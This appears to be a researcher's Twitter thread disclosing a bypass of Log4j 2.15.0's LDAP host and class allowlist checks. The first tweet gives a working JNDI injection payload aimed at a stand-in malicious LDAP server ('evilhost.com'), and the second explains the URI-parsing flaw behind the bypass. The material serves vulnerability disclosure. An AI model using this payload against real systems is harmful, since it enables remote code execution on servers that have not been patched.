FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n
This happens because how the check was done. the java.net.URI getHost() method returns the value before the # as the real host. But the JNDI/LDAP resolver will resolve to the full hostname string attempting to connect to the malicious LDAP server. 2/n 
Also, credits to @pwntester and @_atorralba for being the firsts to point some light on that behavior, if it wasn’t their research I’ll probably not be looking into that. 🙏
https://twitter.com/pwntester/status/1471465662975561734
• • •
Missing some Tweet in this thread? You can try to
force a refresh
